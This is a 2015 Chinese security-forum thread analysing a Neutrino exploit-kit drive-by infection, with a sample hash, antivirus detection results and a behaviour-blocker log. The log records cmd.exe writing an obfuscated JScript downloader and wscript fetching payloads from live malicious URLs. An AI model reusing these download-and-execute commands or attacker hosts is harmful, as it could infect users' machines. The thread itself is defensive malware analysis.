File name: rad8CB57.tmp.exe Detection ratio: 3 / 54 论手工抓马的苦逼性挂马

显示全部楼层 · 发表于 2015-12-26 16:59:50

SHA256: 8db5647fa9de9dc11bb4ae2fc1576062c5ba57116bd08646d8b1b8fa998f0a83
File name: rad8CB57.tmp.exe
Detection ratio: 3 / 54
Analysis date: 2015-12-26 08:41:48 UTC ( 1 minute ago )
https://www.virustotal.com/en/fi ... nalysis/1451119308/

这个挂马一开始进入网页SSF弹窗提示，卡住了，木马没下到本地，然后开启诺顿验证该网页是否存在漏洞攻击。果然，诺顿报了！

再次进入挂马网页，这次SSF不负众望，出色拦截中……bla bla bla……（请无视我口水四溅……）拦截截图不全，看日志吧，整理过的

挂马地址：http://bbs.kafan.cn/thread-1872285-1-1.html

SSF拦截日志：

2015/12/26 16:35:25,C:\Program Files (x86)\Internet Explorer\iexplore.exe,53,Allowed ;执行应用程序 (cmd.exe /q /c cd /d "%tmp%" && echo function o(a){return new ActiveXObject(a)};function hi(g){var f=o(e+"."+e+"Request.5.1");f.setProxy(n);f.open("GET",g(1),n);f.Option(0)=g(2);f.send();if(200==f.status)return r(f.responseText,g(n))};function r(g,f){for(var c)

2015/12/26 16:35:25,C:\Windows\SysWOW64\cmd.exe,53,Allowed ;执行应用程序 (\??\C:\windows\system32\conhost.exe 0xffffffff)

2015/12/26 16:35:25,C:\Windows\System32\conhost.exe,40,Allowed ;以修改权限打开进程或线程 (cmd.exe(pid=5012))

2015/12/26 16:35:26,C:\Windows\SysWOW64\cmd.exe,53,Allowed ;执行应用程序 (wscript  //B dre1.js "widussssip" "http://xjrzyx.olostc.top/word/monkey-goblin-coin-14303312" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; .NET4.0E; .NET4.0C; Tablet PC 2.0; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED)

2015/12/26 16:35:27,C:\Program Files (x86)\Internet Explorer\iexplore.exe,53,Allowed ;执行应用程序 (cmd.exe /q /c cd /d "%tmp%" && echo function o(a){return new ActiveXObject(a)};function hi(g){var f=o(e+"."+e+"Request.5.1");f.setProxy(n);f.open("GET",g(1),n);f.Option(0)=g(2);f.send();if(200==f.status)return r(f.responseText,g(n))};function r(g,f){for(var c)

2015/12/26 16:35:27,C:\Windows\SysWOW64\cmd.exe,53,Allowed ;执行应用程序 (\??\C:\windows\system32\conhost.exe 0xffffffff)

2015/12/26 16:35:27,C:\Windows\System32\conhost.exe,40,Allowed ;以修改权限打开进程或线程 (cmd.exe(pid=804))

2015/12/26 16:35:29,C:\Windows\System32\services.exe,53,Allowed ;执行应用程序 (C:\windows\System32\svchost.exe -k WerSvcGroup)

2015/12/26 16:35:29,C:\Windows\SysWOW64\wscript.exe,50,Allowed ;使用 DNS 解析服务访问网络

2015/12/26 16:35:30,C:\Windows\SysWOW64\cmd.exe,53,Allowed ;执行应用程序 (wscript  //B nv3d.js "widussssip" "http://xjrzyx.olostc.top/2003/05/29/shelf/suffer/except/understand-annoy-southern-careless.html" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; .NET4.0E; .NET4.0C; Tablet PC 2.0; .NET CLR 3.5.30729; .NET CLR 2.0.50)

2015/12/26 16:35:37,C:\Windows\SysWOW64\wscript.exe,48,Allowed ;出站网络访问

2015/12/26 16:35:38,C:\Windows\SysWOW64\wscript.exe,50,Allowed ;使用 DNS 解析服务访问网络

2015/12/26 16:35:39,C:\Windows\SysWOW64\wscript.exe,48,Allowed ;出站网络访问

2015/12/26 16:35:45,C:\Windows\SysWOW64\wscript.exe,53,Allowed ;执行应用程序 ("C:\Windows\System32\cmd.exe" /c rad8CB57.tmp.exe)

2015/12/26 16:35:45,C:\Windows\SysWOW64\cmd.exe,53,Allowed ;执行应用程序 (\??\C:\windows\system32\conhost.exe 0xffffffff)

2015/12/26 16:35:45,C:\Windows\System32\conhost.exe,40,Allowed ;以修改权限打开进程或线程 (cmd.exe(pid=1452))

2015/12/26 16:36:51,C:\Users\AA\AppData\Local\Temp\Low\rad8CB57.tmp.exe,53,Allowed ;执行应用程序 ("C:\windows\SysWOW64\cmd.exe" /c "C:\Users\AA\AppData\Local\Temp\Low\rad8CB57.tmp.exe")

2015/12/26 16:36:51,C:\Windows\SysWOW64\cmd.exe,53,Allowed ;执行应用程序 (\??\C:\windows\system32\conhost.exe 0xffffffff)

2015/12/26 16:36:51,C:\Windows\System32\conhost.exe,40,Allowed ;以修改权限打开进程或线程 (cmd.exe(pid=5648))

2015/12/26 16:36:53,C:\Windows\SysWOW64\cmd.exe,53,Allowed ;执行应用程序 (C:\Users\AA\AppData\Local\Temp\Low\rad8CB57.tmp.exe)

2015/12/26 16:37:15,C:\Users\AA\AppData\Local\Temp\Low\rad8CB57.tmp.exe,47,Allowed ;创建交换数据流 (C:\Windows\Installer\{A67C20B2-376F-67EF-1A2F-7D14FA23D062}\syshost.exe:Zone.Identifier)

2015/12/26 16:37:19,C:\Program Files (x86)\Internet Explorer\iexplore.exe,53,Allowed ;执行应用程序 (cmd.exe /q /c cd /d "%tmp%" && echo function o(a){return new ActiveXObject(a)};function hi(g){var f=o(e+"."+e+"Request.5.1");f.setProxy(n);f.open("GET",g(1),n);f.Option(0)=g(2);f.send();if(200==f.status)return r(f.responseText,g(n))};function r(g,f){for(var c)

2015/12/26 16:37:19,C:\Windows\SysWOW64\cmd.exe,53,Allowed ;执行应用程序 (\??\C:\windows\system32\conhost.exe 0xffffffff)

2015/12/26 16:37:19,C:\Windows\System32\conhost.exe,40,Allowed ;以修改权限打开进程或线程 (cmd.exe(pid=6328))

2015/12/26 16:37:52,C:\windows\Installer\{A67C20B2-376F-67EF-1A2F-7D14FA23D062}\syshost.exe,39,Blocked ;注册驱动程序或服务

2015/12/26 16:37:55,C:\Windows\SysWOW64\cmd.exe,53,Allowed ;执行应用程序 (wscript  //B dre1.js "widussssip" "http://xjrzyx.olostc.top/word/monkey-goblin-coin-14303312" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; .NET4.0E; .NET4.0C; Tablet PC 2.0; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED)

2015/12/26 16:37:56,C:\Program Files (x86)\Internet Explorer\iexplore.exe,53,Allowed ;执行应用程序 (cmd.exe /q /c cd /d "%tmp%" && echo function o(a){return new ActiveXObject(a)};function hi(g){var f=o(e+"."+e+"Request.5.1");f.setProxy(n);f.open("GET",g(1),n);f.Option(0)=g(2);f.send();if(200==f.status)return r(f.responseText,g(n))};function r(g,f){for(var c)

2015/12/26 16:38:27,C:\Users\AA\AppData\Local\Temp\Low\rad8CB57.tmp.exe,26,Blocked ;修改受保护的注册表键 (HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run,syshost32)

2015/12/26 16:38:30,C:\Windows\SysWOW64\wscript.exe,50,Allowed ;使用 DNS 解析服务访问网络

2015/12/26 16:38:32,C:\Windows\SysWOW64\cmd.exe,53,Allowed ;执行应用程序 (wscript  //B nv3d.js "widussssip" "http://xjrzyx.olostc.top/2003/05/29/shelf/suffer/except/understand-annoy-southern-careless.html" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; .NET4.0E; .NET4.0C; Tablet PC 2.0; .NET CLR 3.5.30729; .NET CLR 2.0.50)

2015/12/26 16:38:49,C:\Users\AA\AppData\Local\Temp\Low\rad8CB57.tmp.exe,53,Blocked ;执行应用程序 (C:\windows\Installer\{A67C20B2-376F-67EF-1A2F-7D14FA23D062}\syshost.exe)

2015/12/26 16:38:51,C:\Windows\SysWOW64\wscript.exe,48,Allowed ;出站网络访问

2015/12/26 16:38:52,C:\Program Files (x86)\Internet Explorer\iexplore.exe,53,Allowed ;执行应用程序 (cmd.exe /q /c cd /d "%tmp%" && echo function o(a){return new ActiveXObject(a)};function hi(g){var f=o(e+"."+e+"Request.5.1");f.setProxy(n);f.open("GET",g(1),n);f.Option(0)=g(2);f.send();if(200==f.status)return r(f.responseText,g(n))};function r(g,f){for(var c)

2015/12/26 16:39:09,C:\Windows\SysWOW64\wscript.exe,50,Allowed ;使用 DNS 解析服务访问网络

2015/12/26 16:39:24,C:\Users\AA\AppData\Local\Temp\a44c587a.tmp,26,Blocked ;修改受保护的注册表键 (HKLM\SYSTEM\ControlSet001\Control\SESSION MANAGER,PendingFileRenameOperations)

2015/12/26 16:39:26,C:\Windows\SysWOW64\cmd.exe,53,Allowed ;执行应用程序 (wscript  //B inte.js "widussssip" "http://xjrzyx.olostc.top/milk/marriage-17497915" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; .NET4.0E; .NET4.0C; Tablet PC 2.0; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; LCJB; rv)

2015/12/26 16:39:26,C:\Windows\SysWOW64\wscript.exe,50,Allowed ;使用 DNS 解析服务访问网络

2015/12/26 16:39:29,C:\Windows\SysWOW64\wscript.exe,48,Allowed ;出站网络访问

2015/12/26 16:40:03,C:\Users\AA\AppData\Local\Temp\a44c587a.tmp,53,Allowed ;执行应用程序 (cmd.exe /C del /Q /F "C:\Users\AA\AppData\Local\Temp\a44c587a.tmp")

2015/12/26 16:40:04,C:\Windows\SysWOW64\wscript.exe,48,Allowed ;出站网络访问

显示全部楼层 · 发表于 2015-12-26 17:05:03

本帖最后由墨家小子于 2015-12-26 17:19 编辑

关于Neutrino Exploit Kit，各种理论党看这里：https://blog.malwarebytes.org/ex ... gn-drops-andromeda/

On October 15, we started seeing a new pattern of redirections to the Neutrino Exploit Kit via compromised websites. What actually caught our attention was one of the file names used to inject an iframe pointing to the exploit kit landing page. Ironically, it was called neitrino.php.

哪个用HitmanPro.Alert的可以进挂马网页看看能不能拦截到，好人一生平安！

貌似AhnLab-V3很牛逼的样子

AhnLab-V3 Trojan/Win32.Necurs 20151225
ESET-NOD32 a variant of Win32/Kryptik.EILE 20151225
Rising PE:Malware.XPACK-HIE/Heur!1.9C48 [F] 20151225

++++++++++++++++++++++++++++++++++++++++++

刚运行样本，接收入站数据之后，电脑蓝屏，我好怕怕，黑阔大大生气了！

求实机双击党继续

显示全部楼层 · 发表于 2015-12-26 17:17:27

avast杀，火绒杀。火绒只报代码混淆器，这算真正的查杀吗？

显示全部楼层 · 发表于 2015-12-26 17:21:08

Q1628393554 发表于 2015-12-26 17:17
avast杀，火绒杀。火绒只报代码混淆器，这算真正的查杀吗？

你居然怀疑火绒！作为一名有实力的选手，你真的不怕火绒动用BJ的势力吗？

显示全部楼层 · 发表于 2015-12-26 17:26:50

墨家小子发表于 2015-12-26 17:21
你居然怀疑火绒！作为一名有实力的选手，你真的不怕火绒动用BJ的势力吗？

听不懂，并不知道什么内幕。
代码混淆器到底是不是毒啊

显示全部楼层 · 发表于 2015-12-26 17:31:04

其中一个红伞实时监控报
[mw_shl_code=xml,true]文件“rad8CB57.tmp.exe”
包含病毒或恶意程序“TR/Crypt.EPACK.Gen2 (Cloud)”[trojan][/mw_shl_code]

显示全部楼层 · 发表于 2015-12-26 17:31:48

Q1628393554 发表于 2015-12-26 17:26
听不懂，并不知道什么内幕。
代码混淆器到底是不是毒啊

火绒说是就是

火绒说是就是

火绒说是就是

火绒说是就是

火绒说是就是

火绒说是就是

火绒说是就是

火绒说是就是

火绒说是就是

重要的话我要说九次

显示全部楼层 · 发表于 2015-12-26 17:31:50

显示全部楼层 · 发表于 2015-12-26 17:49:46

红伞本地扫描miss 隔离区云扫报。

显示全部楼层 · 发表于 2015-12-26 17:50:19

卡巴都杀
26.12.2015 17.49.45;检测到的对象 ( 文件 ) 已删除。;D:\360安全浏览器下载\a44c587a\a44c587a.tmp;D:\360安全浏览器下载\a44c587a\a44c587a.tmp;UDS:DangerousObject.Multi.Generic;未知威胁;12/26/2015 17:49:45
26.12.2015 17.49.45;检测到的对象 ( 文件 ) 已删除。;D:\360安全浏览器下载\rad8CB57.tmp\rad8CB57.tmp.exe;D:\360安全浏览器下载\rad8CB57.tmp\rad8CB57.tmp.exe;UDS:DangerousObject.Multi.Generic;未知威胁;12/26/2015 17:49:45

[可疑文件] File name: rad8CB57.tmp.exe Detection ratio: 3 / 54 论手工抓马的苦逼性挂马

本帖子中包含更多资源

评分

评分

本帖子中包含更多资源

评分

本帖子中包含更多资源

[可疑文件] File name: rad8CB57.tmp.exe Detection ratio: 3 / 54 论手工抓马的苦逼性 挂马

本帖子中包含更多资源

评分

评分

本帖子中包含更多资源

评分

本帖子中包含更多资源

[可疑文件] File name: rad8CB57.tmp.exe Detection ratio: 3 / 54 论手工抓马的苦逼性挂马